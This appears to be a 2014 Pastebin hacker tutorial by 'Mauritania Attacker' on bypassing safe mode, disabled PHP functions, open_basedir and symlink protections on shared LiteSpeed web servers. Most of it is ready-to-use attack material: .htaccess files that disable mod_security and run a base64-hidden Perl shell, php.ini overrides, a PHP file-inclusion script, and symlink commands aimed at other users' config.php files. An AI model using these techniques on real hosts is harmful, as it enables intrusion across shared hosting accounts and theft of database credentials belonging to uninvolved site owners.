API tools faq
paste
Advertisement
1337_Brain

Bypass Litespeed 2014

1337_Brain
Jun 25th, 2014
863
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 5.61 KB | None | 0 0
raw download clone embed print report
  1. Hello All , Many People asking me how to bypass litespeed servers 2014 ! ?
  2.  
  3. well actually there is no bypass avalaible , but i found a simple way to bypass safemode & symlink in any server litespeed 2014.
  4.  
  5. and i realized that most of hackers and security researchers who are making tutorial videos online are just liars , because they just show an old bypass , but they do not show us the Kernel Version , year and PHP Version Xd !!! this really sucks -_-
  6.  
  7. let's start :)
  8.  
  9. First thing you must know that the security is very strong in most of servers 2014 (litespeed) \!/
  10.  
  11. So we should be able to do some commands in the server , forget PHP scripts xD !! so when you see "bypass litespeed 2014 PHP scripts"
  12.  
  13. just ignore it ;) some hackers are just talking like eating spaghetty °_° they even do not know how a server works -_-
  14.  
  15. Here the Solutions To Bypass Safemode & Symlink :
  16.  
  17.  
  18. SAFEMODE :
  19.  
  20.  
  21. 1- Use A python script or perl so you can apply commands correctly 100%
  22.  
  23.  
  24. *Simple Perl Shell + .htaccess
  25.  
  26.  
  27. Rename shell perl to ===> shell.root
  28.  
  29. if you have internal server error try to encode your perl shell code with
  30.  
  31. MIME::Base64;
  32. eval(decode_base64('CODE''));
  33.  
  34.  
  35. .htaccess CODE To run Perl Shell :
  36.  
  37.  
  38. Options FollowSymLinks MultiViews Indexes ExecCGI
  39.  
  40. AddType application/x-httpd-cgi .root
  41. AddType application/x-httpd-cgi .root
  42.  
  43.  
  44. AddHandler mod_perl .sh
  45. AddHandler mod_perl .sh
  46.  
  47. AddHandler cgi-script .root
  48. AddHandler cgi-script .root
  49.  
  50.  
  51. We can also use a php.ini file :
  52.  
  53. Safe_mode = OFF
  54. Safe_mode_gid = OFF
  55. Disable_Functions = NONE
  56. Open_basedir = OFF
  57. suhosin.executor.func.blacklist = NONE
  58.  
  59.  
  60.  
  61. Let's Take an example of a Litespeed Server 2014 !
  62.  
  63.  
  64.  
  65. INFOS :
  66.  
  67. Server software: LiteSpeed
  68. PHP : 5.3.28
  69. Disabled PHP Functions: passthru,system,proc_open,popen,ulti_exec,show_source,eval,symlink
  70. Open base dir: /home/user:/usr/lib/php:/usr/php4/lib/php:/usr/local/lib/php:/usr/local/php4/lib/php:/tmp
  71. Safe mode exec dir: /usr/local/php/bin
  72.  
  73.  
  74.  
  75. *PHP
  76.  
  77. if you understand PHP very well , i'm sure you will not have any problem to bypass any server thanks to the PHP version
  78.  
  79. as i explained this on 2009:
  80.  
  81.  
  82. PHP <======> Open base_dir
  83.  
  84. PHP also = BUG xD !
  85.  
  86.  
  87. Disabled PHP Functions : can be bypassed easily just to help us to do more with Functions :) as we can see in the example we have some PHP Functions Disabled : passthru,system,proc_open,popen,ulti_exec,show_source,eval,symlink
  88.  
  89.  
  90. Solution To Bypass PHP FUNCTIONS :
  91.  
  92.  
  93. .HTACCESS CODE :
  94.  
  95. <IfModule mod_security.c>
  96. SecFilterEngine Off
  97. SecFilterScanPOST Off
  98. SecFilterCheckURLEncoding Off
  99. SecFilterCheckCookieFormat Off
  100. SecFilterCheckUnicodeEncoding Off
  101. SecFilterNormalizeCookies Off
  102. </IfModule>
  103. <Limit GET POST>
  104. order deny,allow
  105. deny from all
  106. allow from all
  107. </Limit>
  108. <Limit PUT DELETE>
  109. order deny,allow
  110. deny from all
  111. </Limit>
  112. SetEnv PHPRC /home/user/public_html/test/php.ini
  113.  
  114. and
  115.  
  116. PHP.INI CODE again :
  117.  
  118. Safe_mode = OFF
  119. Safe_mode_gid = OFF
  120. Disable_Functions = NONE
  121. Open_basedir = OFF
  122. suhosin.executor.func.blacklist = NONE
  123.  
  124.  
  125. Another thing wich can help us to bypass the Open Base_dir is ini.php file :
  126.  
  127. CODE INI.PHP :
  128.  
  129. <?
  130. echo ini_get(“safe_mode”);
  131. echo ini_get(“open_basedir”);
  132. include($_GET["file"]);
  133. ini_restore(“safe_mode”);
  134. ini_restore(“open_basedir”);
  135. echo ini_get(“safe_mode”);
  136. echo ini_get(“open_basedir”);
  137. include($_GET["ss"]);
  138. ?>
  139.  
  140.  
  141. And when you try to retrieve any file don't forget to change extension to another extension not .txt
  142.  
  143. like .shtml , .log , .ini , etc........
  144.  
  145.  
  146. ok we done with safemode now let's talk about Bypassing Symlink :
  147.  
  148.  
  149. i will write some .htacess files that can bypass reading files after symlink :
  150.  
  151.  
  152.  
  153. htaccess1:
  154. Options all
  155. DirectoryIndex Sux.html
  156. AddType text/plain .php
  157. AddHandler server-parsed .php
  158. AddType text/plain .html
  159. AddHandler txt .html
  160. Require None
  161. Satisfy Any
  162.  
  163. htaccess2:
  164. <Files *.php>
  165. ForceType application/x-httpd-php4
  166. </Files>
  167.  
  168.  
  169. htaccess3:
  170. OPTIONS Indexes FollowSymLinks SymLinksIfOwnerMatch Includes IncludesNOEXEC ExecCGI
  171. Options Indexes FollowSymLinks
  172. ForceType text/plain
  173. AddType text/plain .php
  174. AddType text/plain .html
  175. AddType text/html .shtml
  176. AddType txt .php
  177. Options All
  178. Options All
  179. <Files *.php>
  180. ForceType application/x-httpd-php4
  181. </Files>
  182.  
  183.  
  184. If you want to bypass Forbidden it's easy just with this .htaccess code :
  185.  
  186. DirectoryIndex config.txt
  187. HeaderName config.txt
  188. ReadmeName config.txt
  189. footerName config.txt
  190.  
  191. Options all
  192. ForceType text/plain
  193. AddType text/plain .php
  194. AddType text/plain .html
  195. AddHandler server-parsed .php
  196. AddHandler txt .php
  197.  
  198.  
  199. you can also try to bypass forbidden from a perl shell :)
  200.  
  201. These commands for example :
  202.  
  203. ln -s /home/user/public_html/config.php HEADER
  204. ln -s /home/user/public_html/config.php README
  205. ln -s /home/user/public_html/config.php FOOTER
  206.  
  207. This one is same like Bypassing reading Files as the previous .htaccess but more better from a perl shell :)
  208.  
  209.  
  210.  
  211. Sometimes also you can bypass reading files with old gold method virtual shtml file read ^_^
  212.  
  213.  
  214. create an .shtml file like "include.shtml" , ghost.ini is the file name you retrieved ^_^
  215.  
  216. file CODE :
  217. <!--#include virtual="ghost.ini" -->
  218.  
  219. or php RewriteEngine method for a virtual file
  220.  
  221. .htaccess virtual CODE :
  222.  
  223. RewriteEngine on
  224. RewriteRule ^new.gh0st config.txt
  225.  
  226.  
  227. This was just some few infos about Litespeed Server Security
  228.  
  229. if you have any problem pm me here : https://www.facebook.com/invincible.man.393 (new account)
  230.  
  231. sorry for my bad english :p , i hate school :p xD !!!
  232.  
  233.  
  234. Thanks ^_^
  235.  
  236.  
  237. ./Mauritania Attacker
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!